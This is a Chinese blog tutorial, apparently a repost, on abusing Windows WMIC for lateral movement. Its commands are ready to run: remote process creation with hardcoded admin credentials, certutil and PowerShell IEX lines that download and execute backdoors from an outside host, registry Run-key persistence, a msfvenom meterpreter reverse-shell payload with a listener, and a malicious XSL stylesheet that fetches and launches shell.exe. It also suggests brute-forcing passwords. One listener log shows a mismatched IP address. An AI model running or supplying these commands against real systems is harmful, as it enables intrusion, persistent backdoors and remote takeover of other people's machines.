WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。

该组件默认集成于 Windows XP - Windows 10 全系列系统中,我们可以通过 WMI 实现数据的收集与管理,包括提供注册、请求传送、远程管理、安全管理、查询能力、和脚本编程能力等,其设计初衷之一是为了管理员能更加方便的对远程 windows 主机进行各种日常管理,,在正常的管理员的眼里 wmic 确实是远程管理的好帮手,但在渗透者眼中,它也同样是一把在目标内网进行横向渗透的趁手武器。

通用使用技巧

在使用WMIC命令之前,首先目标主机必须开启 "Windows Management Instrumentation" 这个系统服务,但默认情况下这个服务是开启状态的,其次,目标主机的防火墙放行了 135 端口,这个端口是WMIC默认的管理端口,但是多数情况下内网主机都会开放这个端口,检测是否开放端口有多种方式,如下:

C:\>  nmap -p 135 192.168.1.30
C:\>  telnet 192.168.1.30 135
C:\>  wmic /node:192.168.1.10 /user:administrator /password:123123 PROCESS call create "calc.exe"

上方的几种方式,都可以用于检测 135端口是否开启,如果上方可以正常访问,那我们就可以继续了,你也可以使用Python写一个脚本,来爆破目标主机的密码,替换上方的user,password字段内容。

1.利用 wmic 实现远程下载后门。首先你需要自行搭建一台服务器,然后放置后门文件shell.exe,然后通过在远程执行certutil命令完成下载后门,最后执行delete清理痕迹。

wmic /node:192.168.1.10 /user:administrator /password:123123 PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://lyshark.com/shell.exe c:/shell.exe
& c:/shell.exe & certutil.exe -urlcache -split -f http://lyshark.com/shell.exe delete"

2.wmic命令可以调用PowerShell脚本,接着我们通过调用 IEX DownloadString 函数来远程加载执行 powershell payload。

wmic /NODE:192.168.1.10/user:"administrator" /password:"123123" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://lyshark.com/shellcode.txt');\""

3.也可以获取到系统的进程相关信息如下所示,当然你也可以指定节点,来实现查看远程主机情况。

wmic process list full                                                            // 显示所以进程
wmic process list brief                                                          // 摘要显示进程
wmic process list status                                                       // 显示进程状态
wmic process where name="qq.exe" get executablepath   // 获取进程的绝对路径// 进程创建相关命令
wmic process call create QQ
wmic process call create "C:/Program Files/Tencent/QQ/QQ.exe"
wmic process call create "ifconfig"// 进程的删除
wmic process where name="qq.exe" call terminate
wmic process where processid="1214" delete
wmic process 1234 call terminate

4.获取操作系统的关键数据,可执行以下命令。

wmic DISKDRIVE get deviceid,Caption,size,InterfaceType                     // 磁盘相关数据
wmic LOGICALDISK get name,Description,filesystem,size,freespace     // 分区相关数据
wmic cpu get name,addresswidth,processorid                                     // CPU相关数据
wmic BaseBoard get Manufacturer,Product,Version,SerialNumber      // 主板相关数据
wmic csproduct get IdentifyingNumber                                                // 获取系统序列号
wmic SOUNDDEV get ProductName                                                     // 声卡相关

5.服务相关命令

// 更改telnet服务启动类型[Auto|Disabled|Manual]
wmic SERVICE where name="tlntsvr" set startmode="Auto"wmic SERVICE where name="tlntsvr" call startservice                // 运行telnet服务
wmic SERVICE where name="ShardAccess" call stopservice      // 停止ICS服务
wmic SERVICE where name="lyshark" call delete                       // 删除lyshark服务

6.目录管理,与计划任务。

wmic FSDIR where "drive='c:' and filename='mk'" list         // 列出c盘下名为mk的目录
wmic fsdir "c://test" call delete                                             // 删除C:/test文件夹
wmic fsdir "c://test" rename "c:/abc"                                   // 重命名文件
wmic fsdir where name='d://test' call copy "c://test"          // 复制文件命令wmic job call create "notepad.exe",0,0,true,false,********154800.000000+480
wmic job call create "explorer.exe",0,0,1,0,********154600.000000+480

7.针对注册表的操作

wmic process call create "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v \"autorun\" /t REG_SZ /d \"C:\windows\autorun.exe\" /f"

通过Wmic反弹后门

Wmic命令不止可用于执行命令,该命令还能够从本地或从远程URL,调用XSL(可扩展样式表语言)脚本,我们可以通过构建恶意的XSL脚本,从而完成上线。

1.首先使用MSF生成一个后门文件,然后运行侦听。

[root@localhost html]# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' lhost=192.168.1.30 lport=8888 -f exe > shell.exe[root@localhost html]# msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > show optionsmsf5 exploit(multi/handler) > set lhost 192.168.1.30
lhost => 192.168.1.7
msf5 exploit(multi/handler) > set lport 8888
lport => 8888
msf5 exploit(multi/handler) > exploit -j -z[*] Started reverse TCP handler on 192.168.1.7:8888

2.接着我们创建一个xsl脚本文件,名称就叫shell.xsl,该脚本通过certtil命令下载恶意后门,然后直接运行。

[root@localhost ~]# vim shell.xsl<?xml version='1.0'?>
<xsl:stylesheet version="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:msxsl="urn:schemas-microsoft-com:xslt"xmlns:user="http://mycompany.com/mynamespace"><msxsl:script language="JScript" implements-prefix="user">function xml(nodelist) {var r = new ActiveXObject("WScript.Shell").Run("certutil.exe -urlcache -split -f http://lyshark.com/shell.exe");var r = new ActiveXObject("WScript.Shell").Run("shell.exe");return nodelist.nextNode().xml;}
</msxsl:script>
<xsl:template match="/"><xsl:value-of select="user:xml(.)"/>
</xsl:template>
</xsl:stylesheet>

3.将后门文件和xsl脚本一并放入自己搭建的web服务器上。

[root@localhost ~]# ls -lh
-rw-r--r-- 1 root root 73K Aug 12 23:33 shell.exe
-rw-r--r-- 1 root root 642 Aug 12 23:36 shell.xsl[root@localhost ~]# cp -a * /var/www/html/
[root@localhost ~]# systemctl restart httpd

4.然后在受害主机运行以下命令,即可实现反弹后门。

wmic os get /FORMAT:"http://lyshark.com/shell.xsl" & timeout /T 1 /NOBREAK & wmic os get /FORMAT:"http://lyshark.com/shell.xsl"

转载于:https://www.cnblogs.com/LyShark/p/11344288.html

WMIC命令的利用技巧相关推荐

  1. Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)

    一.经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名&qu ...

  2. Windows WMIC命令使用详解(附实例)

    第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC的命令行提示符.在WMIC命令行提示符上,命令以交互的方式执行执行"wmic"命令启动WMIC命令行环 ...

  3. Windows WMIC命令使用详解

    Windows WMIC命令使用详解 第一次执行WMIC命令时,Windows首先要安装WMIC,然后显示出WMIC的命令行提示符.在WMIC命令行提示符上,命令以交互的方式执行. 执行"w ...

  4. cpu显示无效查询 wmic_Windows WMIC命令使用详解(附实例)

    执行"wmic"命令启动WMIC命令行环境.这个命令可以在XP或 .NET Server的标准命令行解释器(cmd.exe).Telnet会话或"运行"对话框中 ...

  5. mysql历史命令_MySQL交互技巧

    本文介绍一些与客户端程序mysql进行交互的技巧,这些技巧能帮助我们更有效率地使用它,减少文字输入.此外,还会描述"怎样更加方便地连接到服务器",以及"如何在不经手工输入 ...

  6. 计算机ping 的快捷键,Ping命令使用小技巧

    win7系统中,ping命令的使用可以说是网络故障的宿敌,在ping命令的操作下,各种网络故障都能够被轻松排查,一键重装系统 小编来讲解一下Ping命令使用小技巧吧. Ping命令使用时需要注意:成功 ...

  7. Windows XP系统中实用的命令及操作技巧

    Windows XP系统中实用的命令及操作技巧 转贴自:电脑报 想在命令提示符窗口中输入重复命令时,只须按F7键,就会出现图形界面,然后选择你想输入的命令即可. 一"符"安天下利用 ...

  8. 命令行基础技巧挂载并访问光盘设备

    案例1:命令行基础技巧 案例2:挂载并访问光盘设备 案例3:ls列表及文档创建 案例4:复制.删除.移动 案例5:访问练习用虚拟机 1 案例1:命令行基础技巧 1.1 问题 本例要求掌握Linux命令 ...

  9. 管理员技术(二): 访问练习用虚拟机、 命令行基础技巧 、 挂载并访问光盘设备、ls列表及文档创建、复制删除移动...

    一.访问练习用虚拟机 目标: 学会在教学环境中访问练习用虚拟机,主要完成以下事项: 1> 快速重置教学虚拟机环境        2> 通过"虚拟系统管理器"访问虚拟机 ...

最新文章

  1. 无人驾驶还有多久才能全面推开?
  2. *45.程序的装入方式
  3. 关于Unity中Mecanim动画的动画状态代码控制与代码生成动画控制器
  4. 572. Subtree of Another Tree
  5. ASP.NET 开发人员不必担心 Node 的五大理由
  6. 罗德里格斯(Rodrigues)旋转向量与矩阵的变换
  7. zval php,PHP内核之zval
  8. 关于Oracle数据库导入数据显示中文乱码
  9. 阿拉伯数字转中文大(小)写的函数
  10. 大数据学情分析_大数据时代如何轻松做好学情分析
  11. 测试中常见bug总结
  12. 如何提高数据分析的效率
  13. collectors 求和_Java-Collectors常用的20个方法
  14. [QA翻译]如何在Storm里拆分stream流?
  15. 2021年山东省安全员C证考试内容及山东省安全员C证考试试卷
  16. 计算机网络物理层之宽带接入技术
  17. String对象intern方法
  18. 哈工大2022计统大作业
  19. coldfusion_ColdFusion组件-简介
  20. 2021强网杯 ezmath writeup

热门文章

  1. 2019年感:忆往昔考博岁月,看今朝花样年华
  2. 拯救者Y9000K2021H在ubuntu18.04安装显卡驱动
  3. Ambari2.7.3自定义安装Ambari-Doris-Service
  4. VS2003版本Json格式文件的解析
  5. 解决TC中Make sure FMS_HOME is set properly
  6. fortran和matlab编程的区别,fortran和matlab
  7. Pytorch深度学习入门与实战(笔记)
  8. mapbox 支持国家2000 坐标系的数据
  9. 机房收费系统之简单的逻辑(上)下机费用运算
  10. TCRT5000 红外测距使用解析